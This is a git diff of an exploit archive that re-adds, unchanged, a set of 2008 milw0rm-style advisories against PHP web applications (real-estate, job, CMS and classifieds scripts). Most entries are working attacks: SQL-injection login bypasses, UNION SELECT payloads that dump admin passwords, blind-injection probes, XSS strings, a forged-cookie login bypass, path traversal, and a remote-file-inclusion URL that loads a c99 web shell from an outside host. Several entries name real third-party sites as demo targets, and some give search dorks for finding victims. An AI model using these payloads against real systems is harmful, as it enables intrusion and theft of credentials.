-[~] Date: 23.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] Kucuk Bir Rica: Lutfen Demolarý Hacklemeyin ( pls dont make hack demos )
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz  ( bIktIm )
-[~]
-[~] dork: "Powered by PG Real Estate Solution - real estate web site design"  ( aha size dork :( ( )
-[~] -----------------------------------------------------------
-
-Exploit:
-
-username: [real_admin_name] ' or ' 1=1
-
-password: ZoRLu
-
-note: generally admin name: admin 
-
-
-exploit for demo: 
-
-login: http://www.realtysoft.pro/realestate/demo/admin/index.php
-
-username: admin ' or ' 1=1--
-
-password: ZoRLu
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-23]
+[~] PG Real Estate Solution Auth Bypass
+[~]
+[~]----------------------------------------------------------
+[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
+[~]
+[~] Date: 23.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] Kucuk Bir Rica: Lutfen Demolarý Hacklemeyin ( pls dont make hack demos )
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz  ( bIktIm )
+[~]
+[~] dork: "Powered by PG Real Estate Solution - real estate web site design"  ( aha size dork :( ( )
+[~] -----------------------------------------------------------
+
+Exploit:
+
+username: [real_admin_name] ' or ' 1=1
+
+password: ZoRLu
+
+note: generally admin name: admin 
+
+
+exploit for demo: 
+
+login: http://www.realtysoft.pro/realestate/demo/admin/index.php
+
+username: admin ' or ' 1=1--
+
+password: ZoRLu
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/7201.txt b/platforms/php/webapps/7201.txt
index f30279bbd..b1b5951b5 100755
--- a/platforms/php/webapps/7201.txt
+++ b/platforms/php/webapps/7201.txt
@@ -1,43 +1,43 @@
-[~] PG Roomate Finder Solution Auth Bypass
-[~]
-[~]----------------------------------------------------------
-[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
-[~]
-[~] Date: 23.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] Kucuk Bir Rica: Lutfen Demolarý Hacklemeyin ( pls dont make hack demos )
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz  ( bIktIm )
-[~]
-[~] dork: "Powered by PG Roomate Finder Solution - roommate estate web site design"  ( aha size dork :( ( )
-[~] -----------------------------------------------------------
-
-Exploit:
-
-username: [real_admin_name] ' or ' 1=1
-
-password: ZoRLu
-
-note: generally admin name: admin 
-
-
-exploit for demo: 
-
-login: http://www.realtysoft.pro/roommate/demo/admin/index.php
-
-username: admin ' or ' 1=1--
-
-password: ZoRLu
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-23]
+[~] PG Roomate Finder Solution Auth Bypass
+[~]
+[~]----------------------------------------------------------
+[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
+[~]
+[~] Date: 23.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] Kucuk Bir Rica: Lutfen Demolarý Hacklemeyin ( pls dont make hack demos )
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz  ( bIktIm )
+[~]
+[~] dork: "Powered by PG Roomate Finder Solution - roommate estate web site design"  ( aha size dork :( ( )
+[~] -----------------------------------------------------------
+
+Exploit:
+
+username: [real_admin_name] ' or ' 1=1
+
+password: ZoRLu
+
+note: generally admin name: admin 
+
+
+exploit for demo: 
+
+login: http://www.realtysoft.pro/roommate/demo/admin/index.php
+
+username: admin ' or ' 1=1--
+
+password: ZoRLu
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/7202.txt b/platforms/php/webapps/7202.txt
index d5b0ffca3..65dabe114 100755
--- a/platforms/php/webapps/7202.txt
+++ b/platforms/php/webapps/7202.txt
@@ -1,30 +1,30 @@
-[~] PG Job Site homepage.php (poll_view_id) Blind Sql inj.
-[~]
-[~]----------------------------------------------------------
-[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
-[~]
-[~] Date: 23.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] Kucuk Bir Rica: Lutfen Demolarý Hacklemeyin ( pls dont make hack demos )
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz  ( bIktIm )
-[~] -----------------------------------------------------------
-
-exploit for demo: ( you must login to site after you test this links. you look left for two link)
-
-http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )
-
-http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-23]
+[~] PG Job Site homepage.php (poll_view_id) Blind Sql inj.
+[~]
+[~]----------------------------------------------------------
+[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
+[~]
+[~] Date: 23.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] Kucuk Bir Rica: Lutfen Demolarý Hacklemeyin ( pls dont make hack demos )
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz  ( bIktIm )
+[~] -----------------------------------------------------------
+
+exploit for demo: ( you must login to site after you test this links. you look left for two link)
+
+http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )
+
+http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/7204.txt b/platforms/php/webapps/7204.txt
index 528dd6efd..88498848b 100755
--- a/platforms/php/webapps/7204.txt
+++ b/platforms/php/webapps/7204.txt
@@ -1,64 +1,64 @@
-########################################################################
-#
-#                               ::  The Codes Like A Game Anyone Can Play With It,s ::
-#
-# Title: MODx CMS  <= 0.9.6.2  Multiple Remote Vulne ( RFI + XSS)
-#
-# Vendor: http://modxcms.com/assets/snippets/filedownload/download.php?path=YnVpbGRz&fileName=modx-0.9.6.2.tar.gz&utm_source=0961p2&utm_medium=web&utm_campaign=download
-#
-# Discover by : RoMaNcYxHaCkEr (Br0k3n H34rT)
-#
-# My Email : rxh0@hotmail.com  [ Please Before Added Me , Be Sure I Don,t Give You Anythings :) ]
-#
-# Impact: High
-#
-# Fix: Contact With Me ;)
-#
-# Site: WwW.Sec-Code.CoM
-#
-# My Group : Security - Codes TeaM
-#
-########################################################################
-
-####################
-- Vulne  [RFI] In File snippet.reflect.php In Path assets/snippets/reflect/:
-####################
-
-
-require($reflect_base."configs/default.config.php");
-
-require($reflect_base."default.templates.php");
-
-
-####################
-- Exploit  [RFI]:
-####################
-
-http://WwW.Sec-Code.CoM/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.shellbox.com.ar/%5Bc%5D/c99.txt?
-
-
-####################
-- Exploit  [XSS] In File index.php In Main Path:
-####################
-
-http://WwW.Sec-Code.CoM/modx-0.9.6.2/index.php?id=1
-
-By POST Method Posted That,s In username Box (Variable)
-
-"+onmouseover=alert(400942638703)+
-
-####################
-- Solution:
-####################
-
-Declear & Filter All This Fucking Functions
-
-####################
-- GreTzZ :
-####################
-
-No oN3 D3s3rved Just Fuck The Lamers , Kidz Or Snitch ( I Hate Him , And Do You ...!!! )
-
-####################
-
-# milw0rm.com [2008-11-23]
+########################################################################
+#
+#                               ::  The Codes Like A Game Anyone Can Play With It,s ::
+#
+# Title: MODx CMS  <= 0.9.6.2  Multiple Remote Vulne ( RFI + XSS)
+#
+# Vendor: http://modxcms.com/assets/snippets/filedownload/download.php?path=YnVpbGRz&fileName=modx-0.9.6.2.tar.gz&utm_source=0961p2&utm_medium=web&utm_campaign=download
+#
+# Discover by : RoMaNcYxHaCkEr (Br0k3n H34rT)
+#
+# My Email : rxh0@hotmail.com  [ Please Before Added Me , Be Sure I Don,t Give You Anythings :) ]
+#
+# Impact: High
+#
+# Fix: Contact With Me ;)
+#
+# Site: WwW.Sec-Code.CoM
+#
+# My Group : Security - Codes TeaM
+#
+########################################################################
+
+####################
+- Vulne  [RFI] In File snippet.reflect.php In Path assets/snippets/reflect/:
+####################
+
+
+require($reflect_base."configs/default.config.php");
+
+require($reflect_base."default.templates.php");
+
+
+####################
+- Exploit  [RFI]:
+####################
+
+http://WwW.Sec-Code.CoM/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.shellbox.com.ar/%5Bc%5D/c99.txt?
+
+
+####################
+- Exploit  [XSS] In File index.php In Main Path:
+####################
+
+http://WwW.Sec-Code.CoM/modx-0.9.6.2/index.php?id=1
+
+By POST Method Posted That,s In username Box (Variable)
+
+"+onmouseover=alert(400942638703)+
+
+####################
+- Solution:
+####################
+
+Declear & Filter All This Fucking Functions
+
+####################
+- GreTzZ :
+####################
+
+No oN3 D3s3rved Just Fuck The Lamers , Kidz Or Snitch ( I Hate Him , And Do You ...!!! )
+
+####################
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/7205.txt b/platforms/php/webapps/7205.txt
index b2f3e221f..10db7c62a 100755
--- a/platforms/php/webapps/7205.txt
+++ b/platforms/php/webapps/7205.txt
@@ -1,21 +1,21 @@
-#######################################################
-# Author : BeyazKurt
-# Contact : BeyazKurt@BSDMail.Com
-# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
-#
-# Script : Goople Cms (1.7)
-# Download : http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
-# 
-# Exploit : 
-# Open : http://SITE/win/upload.php
-# javascript:document.cookie = "loggedin=1; path=/";
-# Copy/paste and go and back and upload PHP/HTML etc.. file. (and ingilizceme sokiyim :D )
-# File : http://SITE/user/doc/FILE (or your select)
-# -------------------------------
-#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
-#                       Rinia ShqiptaRe  :) 
-#                       Proud 2 Be MUSLIM !
-#                      Proud 2 Be ALBANIAN !
-#######################################################
-
-# milw0rm.com [2008-11-23]
+#######################################################
+# Author : BeyazKurt
+# Contact : BeyazKurt@BSDMail.Com
+# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
+#
+# Script : Goople Cms (1.7)
+# Download : http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
+# 
+# Exploit : 
+# Open : http://SITE/win/upload.php
+# javascript:document.cookie = "loggedin=1; path=/";
+# Copy/paste and go and back and upload PHP/HTML etc.. file. (and ingilizceme sokiyim :D )
+# File : http://SITE/user/doc/FILE (or your select)
+# -------------------------------
+#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
+#                       Rinia ShqiptaRe  :) 
+#                       Proud 2 Be MUSLIM !
+#                      Proud 2 Be ALBANIAN !
+#######################################################
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/7206.txt b/platforms/php/webapps/7206.txt
index 81564fe6a..97845e5b4 100755
--- a/platforms/php/webapps/7206.txt
+++ b/platforms/php/webapps/7206.txt
@@ -1,58 +1,57 @@
-
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<<!>> Found by  :  Cyb3r-1sT
-
-<<!>> C0ntact : cyb3r-1st [at] hotmail.com 
-                   
-<<!>> Groups : InjEctOr5 T3am 
-
-<<!>> site : www.tryag.cc/cc ....... www.hackteach.org/cc  
-
-=======================================================
-+++++++++++++++++++ Script information+++++++++++++++++
-=======================================================
-
-
-<<->> script   : PHP Classifieds Script
-
-<<->> download : www.phpclassifiedsscript.com  
-
-
-=======================================================
-+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : find it
-
-<<->> Exploit :>>>
-
-                         Step 1 :>  http://www.site.me/path/admin/backup/datadump.sql
-
-                         Step 2 :> read that sql file and search for admin name & pass from "admin" table. 
-
-                         Step 3 :> login in admin panel http://www.site.me/path/admin 
-
-=======================================================
-++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
-=======================================================
-
-<<->> All freinds , all muslims , hcj ( www.hcjlife.com ), str0ke 
-
-# milw0rm.com [2008-11-23]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<<!>> Found by  :  Cyb3r-1sT
+
+<<!>> C0ntact : cyb3r-1st [at] hotmail.com 
+                   
+<<!>> Groups : InjEctOr5 T3am 
+
+<<!>> site : www.tryag.cc/cc ....... www.hackteach.org/cc  
+
+=======================================================
++++++++++++++++++++ Script information+++++++++++++++++
+=======================================================
+
+
+<<->> script   : PHP Classifieds Script
+
+<<->> download : www.phpclassifiedsscript.com  
+
+
+=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : find it
+
+<<->> Exploit :>>>
+
+                         Step 1 :>  http://www.site.me/path/admin/backup/datadump.sql
+
+                         Step 2 :> read that sql file and search for admin name & pass from "admin" table. 
+
+                         Step 3 :> login in admin panel http://www.site.me/path/admin 
+
+=======================================================
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+
+<<->> All freinds , all muslims , hcj ( www.hcjlife.com ), str0ke 
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/7208.txt b/platforms/php/webapps/7208.txt
index 987435335..6b88c6df4 100755
--- a/platforms/php/webapps/7208.txt
+++ b/platforms/php/webapps/7208.txt
@@ -1,44 +1,44 @@
-Real Estate Portal v1.2 (ad_id) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :IQ-SecuriTY >   www.IQ-TY.com   |  TrYaG > www.TrYaG.cc
-
-Mail :  darkangel_G85@yahoo.com
-
-___________________________________
-
-script  : http://www.netartmedia.net/realestate/
-
-DorK : "Powered by Real Estate Portal"
-
-exploit :
-_______
-
-http://www.site.com/index.php?mod=re_send_email&ad_id=-7+union+select+concat(username,0x3e,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+websiteadmin_admin_users--
-
-
-
-Demo :
-_______
-
-http://hotelsaustriadirect.com/index.php?mod=re_send_email&ad_id=-7+union+select+concat(username,0x3e,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+websiteadmin_admin_users--
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
-|_____________________________________________________________________
-
-
-
-                             IM IraQi    |       IM TrYaGI
-
-# milw0rm.com [2008-11-24]
+Real Estate Portal v1.2 (ad_id) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :IQ-SecuriTY >   www.IQ-TY.com   |  TrYaG > www.TrYaG.cc
+
+Mail :  darkangel_G85@yahoo.com
+
+___________________________________
+
+script  : http://www.netartmedia.net/realestate/
+
+DorK : "Powered by Real Estate Portal"
+
+exploit :
+_______
+
+http://www.site.com/index.php?mod=re_send_email&ad_id=-7+union+select+concat(username,0x3e,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+websiteadmin_admin_users--
+
+
+
+Demo :
+_______
+
+http://hotelsaustriadirect.com/index.php?mod=re_send_email&ad_id=-7+union+select+concat(username,0x3e,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+websiteadmin_admin_users--
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
+|_____________________________________________________________________
+
+
+
+                             IM IraQi    |       IM TrYaGI
+
+# milw0rm.com [2008-11-24]
diff --git a/platforms/php/webapps/7210.txt b/platforms/php/webapps/7210.txt
index 2f22b2793..f4e1a509e 100755
--- a/platforms/php/webapps/7210.txt
+++ b/platforms/php/webapps/7210.txt
@@ -1,28 +1,28 @@
--============================================-
-Autore: x0r - Evolution Team
-Msn: andry2000@hotmail.it
-Cms: Goople Cms 1.7
-Bug: Arbitrary File Creation
-Download:
-http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
--============================================-
-
-Exploit:
-
-#Attack One
-
-Logg yourself like a normal user then in your meno go on "Notepad" (
-/win/notepad/index.php ), in this notepad you can make a php shell :P
-
-#Attack Two
-
-Use this js code for bypass the log in: javascript:document.cookie =
-"loggedin=1; path=/"; <--- tnx BeyazKurt
-
-And then go to /win/notepad/index.php
-
-
-Greetz: Amore mio oggi sono 48 giorni...Ti AmO Da Impazzire... A + M....
-Bimba Mia Sei La Mia Vita...
-
-# milw0rm.com [2008-11-24]
+-============================================-
+Autore: x0r - Evolution Team
+Msn: andry2000@hotmail.it
+Cms: Goople Cms 1.7
+Bug: Arbitrary File Creation
+Download:
+http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
+-============================================-
+
+Exploit:
+
+#Attack One
+
+Logg yourself like a normal user then in your meno go on "Notepad" (
+/win/notepad/index.php ), in this notepad you can make a php shell :P
+
+#Attack Two
+
+Use this js code for bypass the log in: javascript:document.cookie =
+"loggedin=1; path=/"; <--- tnx BeyazKurt
+
+And then go to /win/notepad/index.php
+
+
+Greetz: Amore mio oggi sono 48 giorni...Ti AmO Da Impazzire... A + M....
+Bimba Mia Sei La Mia Vita...
+
+# milw0rm.com [2008-11-24]
diff --git a/platforms/php/webapps/7214.txt b/platforms/php/webapps/7214.txt
index 6cf988222..bbb935e26 100755
--- a/platforms/php/webapps/7214.txt
+++ b/platforms/php/webapps/7214.txt
@@ -1,31 +1,31 @@
--------------------------------------------------------------------------
-  --          JIKO FroM No-exploit.Com        ---
--------------------------------------------------------------------------
-# Author  : jiko
-# email  : jalikom@hotmail.com
-# Home   : www.no-exploit.Com
-# Script  : FTPZIK ->>http://www.bladi.13.fr/dm-up/ftpzik.zip
-
-=========================JIkI Team===================
-# Exploit  :
-               http://no-exploit.com
-			    [name of file iwthout php]
-  http://no-exploit.com/[script]/?p=cat&c=../
-  http://no-exploit.com/[script]/?p=cat&c=<br>jiko <script>alert(11)</script>
-  http://no-exploit.com/[script]/inc/cat.php?c=<br>jiko <script>alert(11)</script>
-  http://no-exploit.com/[script]/inc/content.php?p=[file]
-  http://no-exploit.com/[script]/?p=[file]
-
-=========================JIKI Team===================
- greetz : all my friend and all No-exploit members and 
- $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $ MizoZ $ The-PunisheR
- all muslims
- visit:  ==> www.no-exploit.Com
- Visit: My-montada.Co.cc For your free Forum
--------------------------------------------------------------------------
-  --            JIKI Team [ JIKO + KIl1er ]    --
--------------------------------------------------------------------------
-------==        troops of Mohamed comming inchalah     =-----------------
-Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc
-
-# milw0rm.com [2008-11-24]
+-------------------------------------------------------------------------
+  --          JIKO FroM No-exploit.Com        ---
+-------------------------------------------------------------------------
+# Author  : jiko
+# email  : jalikom@hotmail.com
+# Home   : www.no-exploit.Com
+# Script  : FTPZIK ->>http://www.bladi.13.fr/dm-up/ftpzik.zip
+
+=========================JIkI Team===================
+# Exploit  :
+               http://no-exploit.com
+			    [name of file iwthout php]
+  http://no-exploit.com/[script]/?p=cat&c=../
+  http://no-exploit.com/[script]/?p=cat&c=<br>jiko <script>alert(11)</script>
+  http://no-exploit.com/[script]/inc/cat.php?c=<br>jiko <script>alert(11)</script>
+  http://no-exploit.com/[script]/inc/content.php?p=[file]
+  http://no-exploit.com/[script]/?p=[file]
+
+=========================JIKI Team===================
+ greetz : all my friend and all No-exploit members and 
+ $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $ MizoZ $ The-PunisheR
+ all muslims
+ visit:  ==> www.no-exploit.Com
+ Visit: My-montada.Co.cc For your free Forum
+-------------------------------------------------------------------------
+  --            JIKI Team [ JIKO + KIl1er ]    --
+-------------------------------------------------------------------------
+------==        troops of Mohamed comming inchalah     =-----------------
+Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc
+
+# milw0rm.com [2008-11-24]
diff --git a/platforms/php/webapps/7215.txt b/platforms/php/webapps/7215.txt
index 8da7d330a..0276319d8 100755
--- a/platforms/php/webapps/7215.txt
+++ b/platforms/php/webapps/7215.txt
@@ -1,53 +1,53 @@
-[~] Bandwebsite Version 1.5 Sql & XSS Multiple Remote Vuln.
-[~]
-[~] download: http://membres.lycos.fr/fluxx/bandwebsite.php
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
-[~]
-[~] Date: 24.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] Kucuk Bir Rica: Lutfen DemolarI Hacklemeyin ( pls dont make hack demos )
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] N0T: OGRETMENLER GUNUMUZ KUTLU OLSUN : ) )
-[~]
-[~] N0T: RedHaK Kardesime ozel tesekurler.
-[~] -----------------------------------------------------------
-
-exploit:
-
-http://localhost/script/lyrics.php?section=full&id=[SQL]
-
-http://localhost/script/info.php?section=[XSS]
-
-[SQL]
-
-99999999+union+select+1,name,3,pass,5+from+admin--
-
-
-example:
-
-http://www.caro-kunde.de/lyrics.php?section=full&id=99999999+union+select+1,name,3,pass,5+from+admin--
-
-login:
-
-http://www.caro-kunde.de/login.php
-
-
-XSS:
-
-http://www.caro-kunde.de/info.php?section="><script>alert()</script>
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & RedHaK
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-24]
+[~] Bandwebsite Version 1.5 Sql & XSS Multiple Remote Vuln.
+[~]
+[~] download: http://membres.lycos.fr/fluxx/bandwebsite.php
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
+[~]
+[~] Date: 24.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] Kucuk Bir Rica: Lutfen DemolarI Hacklemeyin ( pls dont make hack demos )
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] N0T: OGRETMENLER GUNUMUZ KUTLU OLSUN : ) )
+[~]
+[~] N0T: RedHaK Kardesime ozel tesekurler.
+[~] -----------------------------------------------------------
+
+exploit:
+
+http://localhost/script/lyrics.php?section=full&id=[SQL]
+
+http://localhost/script/info.php?section=[XSS]
+
+[SQL]
+
+99999999+union+select+1,name,3,pass,5+from+admin--
+
+
+example:
+
+http://www.caro-kunde.de/lyrics.php?section=full&id=99999999+union+select+1,name,3,pass,5+from+admin--
+
+login:
+
+http://www.caro-kunde.de/login.php
+
+
+XSS:
+
+http://www.caro-kunde.de/info.php?section="><script>alert()</script>
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & RedHaK
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-24]
diff --git a/platforms/php/webapps/7216.txt b/platforms/php/webapps/7216.txt
index 4fdd1f098..ea3a825ba 100755
--- a/platforms/php/webapps/7216.txt
+++ b/platforms/php/webapps/7216.txt
@@ -1,112 +1,112 @@
-Application:  WebStudio CMS
-
- 
-
-Vendor Name: BDigital Media Ltd
-
- 
-
-Vendors Url:  http://www.bdigital.biz
-
- 
-
-Bug Type:     WebStudio CMS (pageid) Blind SQL Injection Vulnerability
-
- 
-
-Exploitation: Remote
-
- 
-
-Severity: Critical
-
- 
-
-Solution Status: Unpatched 
-
- 
-
-Introduction: WebStudio CMS is a modular Web Content Management System
-solution.
-
- 
-
-Google Dork:  "Powered by WebStudio"
-
- 
-
- 
-
-Description:
-
- 
-
-WebStudio CMS is prone to an SQL-injection vulnerability because it fails to
-sufficiently sanitize user-supplied data before using it in an SQL query.
-
-Exploiting this issue could allow an attacker to compromise the application,
-access or modify data, or exploit latent vulnerabilities in the underlying
-database.
-
- 
-
-PoC:
-
- 
-
-http://localhost/index.php?pageid=1+and+1=1 ( TRUE  )
-
- 
-
-http://localhost/index.php?pageid=1+and+1=2 ( FALSE )
-
- 
-
-Exploit:
-
- 
-
-http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE  )
-
- 
-
-http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE )
-
- 
-
-http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE )
-
- 
-
-Solution:
-
- 
-
-There was no vendor-supplied solution at the time of entry.
-
- 
-
-Edit source code manually to ensure user-supplied input is correctly
-sanitised.
-
- 
-
- 
-
-Credits:
-
- 
-
-Charalambous Glafkos
-
-Email:  glafkos (at) astalavista (dot) com
-
-___________________________________________
-
-ASTALAVISTA - the hacking & security community
-
-www.astalavista.com
-
-www.astalavista.net
-
